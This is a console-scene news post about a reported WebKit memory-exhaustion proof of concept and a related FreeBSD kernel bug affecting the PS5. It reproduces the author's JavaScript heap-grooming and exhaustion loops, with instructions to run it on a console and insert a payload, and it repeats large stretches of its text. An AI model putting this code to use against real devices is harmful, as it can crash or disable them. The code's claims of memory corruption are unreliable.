Recently @zecoxao shared via X Post a FreeBSD Kernel Bug Security Advisory while confirming the PlayStation 5 vulnerability works alongside a WebKit Memory Leak Proof-of-Concept (PoC) test page for all WebKit browsers (PS4 / PS5 including Safari) by Debv on Github aka idebty on X (DebTy's Ko-fi Page )... which Kameleonre_ on X notes has since been fixed (CVE-2024-43102).
From the Github repository's README.md: Memory Leak
Author: idebty
I'm self taught I don't know any one in the community if you want to use this use it but credit me.
WebKit Memory Leak PoC
Description
This Proof of Concept (PoC) demonstrates a WebKit memory exhaustion exploit that I have been working on. The current iteration works but still needs to be fully exploited. Below is the JavaScript code that shows how it operates, along with explanations of each step.
How it Works
The code below follows five key steps:
## Instructions
This PoC is for educational purposes only. The author is not responsible for any misuse of this code.
IM NOT LIABLE TO ANY DAMAGES CAUSED BY THIS POC OR ANY OTHER USE OF IT THIS CAN BRICK AND MIGHT BRICK YOUR SYSTEM IF LEFT UNEDITED
A Message to Sony
Sony I have reported this and got dismissed and I have provided enough proof plus with that unreleased PoC it's not my fault that even after 6months you didn't fix it I have gave you more then enough to fix this is to hopefully encourage you to fix it
Heap Memory Exploit Code
Kameleonre_ on X notes, "Ok the bugged code it's not on FreeBSD 9.0 which means not valid for PS4.. but it's on PS5.. thx to SiSTR0 and iMrDJAi for pointing it... this is the C code on FreeBSD 9.0. Bug not there..." further stating, "But it's on FreeBSD 11 branch [PS5] this is the line which contains the bug."
According to notnotzecoxao on X, "also my friend said this should work on 1.xx and 2.xx as well as up until some of the most recent fws," while @CrazyVoid asks in an X post, "why does he not release his impl of the kernel bug? instead of making people recreate the work over again" as CrazyVoidPS4 then admits, "to be fair, specter enjoys working on things like that I think."
Shortly afterwards, idebty stated, "Someone modified my code idk what he did but he just made it trigger an error everytime it's a system error at that it seems like he's trying to make it copy a payload.bin. This might be a first for Sony an exploit that releases for the latest firmware" with @SeregonWar on Github responding in an X post, "Hi! I am the creator of the fork! I don't know if the changes I made will work, I am trying to exploit the vulnerability somehow, thanks for your work in finding the vulnerability!"
Update: @zecoxao announced via X Post, "confirmed by @flatz that 8.00 patches this bug" going on to clarify, "the kernel bug, I might add" and then further elaborating, "to everyone that did not understand flatz's words: it's likely that sony never intended to fix this bug, and accidentally "fixed" it on 8.00 by patching syscall and libkernel access from the main contenders such as bluray java, webkit and ps2 games."
This PS5Scene news comes following the PS5 IPV6 Kernel Exploit v1.03, previous updates, PS4 v10.00-11.02 & PS5 v6.00-8.60 PoC Test, TheFlow0's Recent HackerOne Bug Report, PS4 / PS5 Semi-Permanent Exploits (WIP), PS5 Pro Tech Presentation by Mark Cerny and Sony's Official PS5 Pro Launch Date Announcement earlier on.
Spoiler: Related X Posts
From the Github repository's README.md: Memory Leak
Author: idebty
I'm self taught I don't know any one in the community if you want to use this use it but credit me.
WebKit Memory Leak PoC
Description
This Proof of Concept (PoC) demonstrates a WebKit memory exhaustion exploit that I have been working on. The current iteration works but still needs to be fully exploited. Below is the JavaScript code that shows how it operates, along with explanations of each step.
How it Works
The code below follows five key steps:
- Heap Initialization: Allocates memory in a controlled manner.
- Heap Grooming: Manipulates memory to create gaps for the exploit.
- Memory Exhaustion: Continuously allocates and clears memory to exhaust resources.
- Payload Execution: Executes the payload to perform memory corruption.
- Exploit Execution: Runs the steps in sequence to trigger the memory exhaustion.
Code:
// Step 1: Initialize Controlled Memory
function initializeHeap() {
//alert("Int heap");
let buffers = [];
for (let i = 0; i < 2048; i++) { // Reduced allocations
buffers.push(new ArrayBuffer(500000)); // Smaller blocks of memory
}
return buffers;
}
// Step 2: Groom the Heap
function groomHeap() {
//alert("groom heap");
let tempArray = [];
// Allocate and deallocate in patterns
for (let i = 0; i < 2048; i++) { // Reduced iterations
let buffer = new ArrayBuffer(1000); // Allocate smaller blocks
tempArray.push(buffer);
}
// Deallocate some of the buffers to create holes in the heap
for (let i = 0; i < 1512; i++) { // Fewer deallocations
tempArray[i] = null; // Free up space to create holes in the heap
}
return tempArray;
}
// Step 3: Memory Exhaustion Function
function memExh() {
let bufferArray = [];
for (let i = 0; i < 2048; i++) { // Reduced iterations
bufferArray.push(new ArrayBuffer(900000)); // Allocate smaller buffers
if (bufferArray.length > 512) { // Less aggressive clearing
bufferArray = []; // Clear buffer array to exhaust memory
}
}
}
// Step 4: The Exploit Payload Function
function payload() {
let largeString = "B".repeat(900000); // Smaller initial string
let obj = {};
let iterationCount = 0; // Counter to track number of iterations
while (true) {
// String concatenation
largeString += largeString;
if (largeString.length > 100000000) { // Lower threshold for reset
largeString = "B".repeat(900000); // Reset string to avoid overflow
}
memExh();
iterationCount++;
if (iterationCount > 64) break; // Control the number of iterations
}
}
// Step 5: Perform the Exploit
function performExploit() {
let controlledBuffers = initializeHeap(); // Initialize the heap
let groomedHeap = groomHeap(); // Groom the heap
// Start memory corruption
memExh();
// Run the payload
payload();
}
performExploit();
## Instructions
- Copy the above code and run it in a Exploitable PS5 (Works Until guess 9.60?) this might not be useful in ps4
- Be mindful that this is a PoC and should be used for educational purposes only.
- Further testing is required to fully understand this vulnerability.
- Place Your Payload in the payload function
This PoC is for educational purposes only. The author is not responsible for any misuse of this code.
IM NOT LIABLE TO ANY DAMAGES CAUSED BY THIS POC OR ANY OTHER USE OF IT THIS CAN BRICK AND MIGHT BRICK YOUR SYSTEM IF LEFT UNEDITED
A Message to Sony
Sony I have reported this and got dismissed and I have provided enough proof plus with that unreleased PoC it's not my fault that even after 6months you didn't fix it I have gave you more then enough to fix this is to hopefully encourage you to fix it
Heap Memory Exploit Code
Code:
function memmexh() {
// Simulate allocation of an object
let obj = { data: "important data" };
// Reference to the object
let ref = obj;
// Simulate freeing the object
obj = null;
}
function ComplexOverflow() {
let largeString = "A".repeat(1000000); // 1 million A's
let bufferArray = [];
let nestedArray = [];
let obj = {};
let counter = 0;
let counterr = 0;
while (true) {
// String concatenation
largeString += largeString;
if (largeString.length > 100000000) {
largeString = "A".repeat(1000000);
}
// Array buffer allocation
bufferArray.push(new ArrayBuffer(1000000));
if (bufferArray.length > 1000) {
bufferArray = [];
}
// Nested arrays
nestedArray.push([]);
if (nestedArray.length > 1000) {
nestedArray = [];
}
counterr++;
if (counterr >= 100) {
location.reload();
}
// Object property expansion
obj[counter] = "A".repeat(1000);
counter++;
if (counter > 10000000) {
obj = {};
counter = 0;
}
}
}
let MTestClassesArray = [];
class MTestClass {
constructor() {}
}
const create_1000_objects = () => {
let counter = 0;
memmexh()
while (true) {
// Simulate allocation of an object
let obj = { data: "important data" };
// Reference to the object
let ref = obj;
counter++;
if (counter >= 500) {
location.reload();
}
for (let i = 0; i < 1000; i++) {
MTestClassesArray.push(new MTestClass());
}
const text = `Total ${MTestClassesArray.length} MTestClass objects created`;
document.getElementById('divMsg').innerHTML = text;
}
}
Kameleonre_ on X notes, "Ok the bugged code it's not on FreeBSD 9.0 which means not valid for PS4.. but it's on PS5.. thx to SiSTR0 and iMrDJAi for pointing it... this is the C code on FreeBSD 9.0. Bug not there..." further stating, "But it's on FreeBSD 11 branch [PS5] this is the line which contains the bug."
According to notnotzecoxao on X, "also my friend said this should work on 1.xx and 2.xx as well as up until some of the most recent fws," while @CrazyVoid asks in an X post, "why does he not release his impl of the kernel bug? instead of making people recreate the work over again" as CrazyVoidPS4 then admits, "to be fair, specter enjoys working on things like that I think."
Shortly afterwards, idebty stated, "Someone modified my code idk what he did but he just made it trigger an error everytime it's a system error at that it seems like he's trying to make it copy a payload.bin. This might be a first for Sony an exploit that releases for the latest firmware" with @SeregonWar on Github responding in an X post, "Hi! I am the creator of the fork! I don't know if the changes I made will work, I am trying to exploit the vulnerability somehow, thanks for your work in finding the vulnerability!"
Update: @zecoxao announced via X Post, "confirmed by @flatz that 8.00 patches this bug" going on to clarify, "the kernel bug, I might add" and then further elaborating, "to everyone that did not understand flatz's words: it's likely that sony never intended to fix this bug, and accidentally "fixed" it on 8.00 by patching syscall and libkernel access from the main contenders such as bluray java, webkit and ps2 games."
This PS5Scene news comes following the PS5 IPV6 Kernel Exploit v1.03, previous updates, PS4 v10.00-11.02 & PS5 v6.00-8.60 PoC Test, TheFlow0's Recent HackerOne Bug Report, PS4 / PS5 Semi-Permanent Exploits (WIP), PS5 Pro Tech Presentation by Mark Cerny and Sony's Official PS5 Pro Launch Date Announcement earlier on.
Spoiler: Related X Posts